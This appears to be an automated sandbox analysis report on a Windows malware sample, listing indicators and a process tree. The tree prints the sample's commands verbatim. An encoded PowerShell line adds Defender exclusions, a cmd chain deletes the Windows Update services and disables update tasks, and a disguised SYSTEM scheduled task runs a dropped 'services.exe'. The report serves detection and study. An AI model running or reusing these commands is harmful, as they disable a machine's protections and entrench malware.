Analysis
-
max time kernel
308s -
max time network
318s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
10-05-2022 22:15
Static task
static1
Behavioral task
behavioral1
Sample
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
Resource
win7-20220414-en
General
-
Target
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe
-
Size
5.3MB
-
MD5
52fdd7f3ed1b50bc5794983a37cb4064
-
SHA1
4a185751e9e94dccb3330ca79f893de7ca080482
-
SHA256
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2
-
SHA512
4f8c70f866320cdd3a38beb9fdd2820840171677e0e1ad993c05dbe5c64b5b919d2455c01ce619b96d6cdeabf703299301bd766e3c6860b44a7b19fe67db028f
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Executes dropped EXE 1 IoCs
Processes:
services.exepid process 1632 services.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3964 takeown.exe 2840 icacls.exe 2736 takeown.exe 872 icacls.exe -
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 3964 takeown.exe 2840 icacls.exe 2736 takeown.exe 872 icacls.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 1148 set thread context of 1344 1148 conhost.exe conhost.exe -
Drops file in Program Files directory 2 IoCs
Processes:
conhost.exedescription ioc process File created C:\Program Files\Windows\services.exe conhost.exe File opened for modification C:\Program Files\Windows\services.exe conhost.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 52 IoCs
Processes:
powershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2328 reg.exe 3464 reg.exe 644 reg.exe 3212 reg.exe 3860 reg.exe 4048 reg.exe 3812 reg.exe 1752 reg.exe 4028 reg.exe 2136 reg.exe 2176 reg.exe 1108 reg.exe 1812 reg.exe 1688 reg.exe 1020 reg.exe 2848 reg.exe 2352 reg.exe 2204 reg.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exepid process 1020 powershell.exe 1020 powershell.exe 1020 powershell.exe 1928 conhost.exe 3868 powershell.exe 3868 powershell.exe 3868 powershell.exe 1148 conhost.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
powershell.exetakeown.execonhost.exepowershell.execonhost.exetakeown.exedescription pid process Token: SeDebugPrivilege 1020 powershell.exe Token: SeIncreaseQuotaPrivilege 1020 powershell.exe Token: SeSecurityPrivilege 1020 powershell.exe Token: SeTakeOwnershipPrivilege 1020 powershell.exe Token: SeLoadDriverPrivilege 1020 powershell.exe Token: SeSystemProfilePrivilege 1020 powershell.exe Token: SeSystemtimePrivilege 1020 powershell.exe Token: SeProfSingleProcessPrivilege 1020 powershell.exe Token: SeIncBasePriorityPrivilege 1020 powershell.exe Token: SeCreatePagefilePrivilege 1020 powershell.exe Token: SeBackupPrivilege 1020 powershell.exe Token: SeRestorePrivilege 1020 powershell.exe Token: SeShutdownPrivilege 1020 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeSystemEnvironmentPrivilege 1020 powershell.exe Token: SeRemoteShutdownPrivilege 1020 powershell.exe Token: SeUndockPrivilege 1020 powershell.exe Token: SeManageVolumePrivilege 1020 powershell.exe Token: 33 1020 powershell.exe Token: 34 1020 powershell.exe Token: 35 1020 powershell.exe Token: 36 1020 powershell.exe Token: SeTakeOwnershipPrivilege 3964 takeown.exe Token: SeDebugPrivilege 1928 conhost.exe Token: SeDebugPrivilege 3868 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3868 powershell.exe Token: SeIncreaseQuotaPrivilege 3868 powershell.exe Token: SeSecurityPrivilege 3868 powershell.exe Token: SeTakeOwnershipPrivilege 3868 powershell.exe Token: SeLoadDriverPrivilege 3868 powershell.exe Token: SeSystemtimePrivilege 3868 powershell.exe Token: SeBackupPrivilege 3868 powershell.exe Token: SeRestorePrivilege 3868 powershell.exe Token: SeShutdownPrivilege 3868 powershell.exe Token: SeSystemEnvironmentPrivilege 3868 powershell.exe Token: SeUndockPrivilege 3868 powershell.exe Token: SeManageVolumePrivilege 3868 powershell.exe Token: SeDebugPrivilege 1148 conhost.exe Token: SeTakeOwnershipPrivilege 2736 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.execonhost.execmd.execmd.execmd.execmd.exeservices.execonhost.execmd.exedescription pid process target process PID 1352 wrote to memory of 1928 1352 e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe conhost.exe PID 1352 wrote to memory of 1928 1352 e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe conhost.exe PID 1352 wrote to memory of 1928 1352 e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe conhost.exe PID 1928 wrote to memory of 3500 1928 conhost.exe cmd.exe PID 1928 wrote to memory of 3500 1928 conhost.exe cmd.exe PID 3500 wrote to memory of 1020 3500 cmd.exe powershell.exe PID 3500 wrote to memory of 1020 3500 cmd.exe powershell.exe PID 1928 wrote to memory of 1820 1928 conhost.exe cmd.exe PID 1928 wrote to memory of 1820 1928 conhost.exe cmd.exe PID 1820 wrote to memory of 232 1820 cmd.exe sc.exe PID 1820 wrote to memory of 232 1820 cmd.exe sc.exe PID 1820 wrote to memory of 192 1820 cmd.exe sc.exe PID 1820 wrote to memory of 192 1820 cmd.exe sc.exe PID 1820 wrote to memory of 320 1820 cmd.exe sc.exe PID 1820 wrote to memory of 320 1820 cmd.exe sc.exe PID 1820 wrote to memory of 188 1820 cmd.exe sc.exe PID 1820 wrote to memory of 188 1820 cmd.exe sc.exe PID 1820 wrote to memory of 2324 1820 cmd.exe sc.exe PID 1820 wrote to memory of 2324 1820 cmd.exe sc.exe PID 1820 wrote to memory of 3212 1820 cmd.exe reg.exe PID 1820 wrote to memory of 3212 1820 cmd.exe reg.exe PID 1820 wrote to memory of 2204 1820 cmd.exe reg.exe PID 1820 wrote to memory of 2204 1820 cmd.exe reg.exe PID 1820 wrote to memory of 4028 1820 cmd.exe reg.exe PID 1820 wrote to memory of 4028 1820 cmd.exe reg.exe PID 1820 wrote to memory of 1812 1820 cmd.exe reg.exe PID 1820 wrote to memory of 1812 1820 cmd.exe reg.exe PID 1820 wrote to memory of 3860 1820 cmd.exe reg.exe PID 1820 wrote to memory of 3860 1820 cmd.exe reg.exe PID 1820 wrote to memory of 3964 1820 cmd.exe takeown.exe PID 1820 wrote to memory of 3964 1820 cmd.exe takeown.exe PID 1820 wrote to memory of 2840 1820 cmd.exe icacls.exe PID 1820 wrote to memory of 2840 1820 cmd.exe icacls.exe PID 1928 wrote to memory of 1108 1928 conhost.exe cmd.exe PID 1928 wrote to memory of 1108 1928 conhost.exe cmd.exe PID 1108 wrote to memory of 1340 1108 cmd.exe schtasks.exe PID 1108 wrote to memory of 1340 1108 cmd.exe schtasks.exe PID 1928 wrote to memory of 512 1928 conhost.exe cmd.exe PID 1928 wrote to memory of 512 1928 conhost.exe cmd.exe PID 512 wrote to memory of 3616 512 cmd.exe schtasks.exe PID 512 wrote to memory of 3616 512 cmd.exe schtasks.exe PID 1632 wrote to memory of 1148 1632 services.exe conhost.exe PID 1632 wrote to memory of 1148 1632 services.exe conhost.exe PID 1632 wrote to memory of 1148 1632 services.exe conhost.exe PID 1148 wrote to memory of 1368 1148 conhost.exe cmd.exe PID 1148 wrote to memory of 1368 1148 conhost.exe cmd.exe PID 1368 wrote to memory of 3868 1368 cmd.exe powershell.exe PID 1368 wrote to memory of 3868 1368 cmd.exe powershell.exe PID 1820 wrote to memory of 2328 1820 cmd.exe reg.exe PID 1820 wrote to memory of 2328 1820 cmd.exe reg.exe PID 1820 wrote to memory of 1688 1820 cmd.exe reg.exe PID 1820 wrote to memory of 1688 1820 cmd.exe reg.exe PID 1820 wrote to memory of 2136 1820 cmd.exe reg.exe PID 1820 wrote to memory of 2136 1820 cmd.exe reg.exe PID 1820 wrote to memory of 1020 1820 cmd.exe reg.exe PID 1820 wrote to memory of 1020 1820 cmd.exe reg.exe PID 1820 wrote to memory of 2388 1820 cmd.exe schtasks.exe PID 1820 wrote to memory of 2388 1820 cmd.exe schtasks.exe PID 1820 wrote to memory of 224 1820 cmd.exe schtasks.exe PID 1820 wrote to memory of 224 1820 cmd.exe schtasks.exe PID 1820 wrote to memory of 220 1820 cmd.exe schtasks.exe PID 1820 wrote to memory of 220 1820 cmd.exe schtasks.exe PID 1820 wrote to memory of 3512 1820 cmd.exe schtasks.exe PID 1820 wrote to memory of 3512 1820 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\e47252c61865cc671c7dc0a14ded408544775381a4769f35d31d364afda410f2.exe"2⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Program Files\Windows\services.exe"C:\Program Files\Windows\services.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGIAYgB2ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZABsAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAawB3AGsAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdAB0AGYAYQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
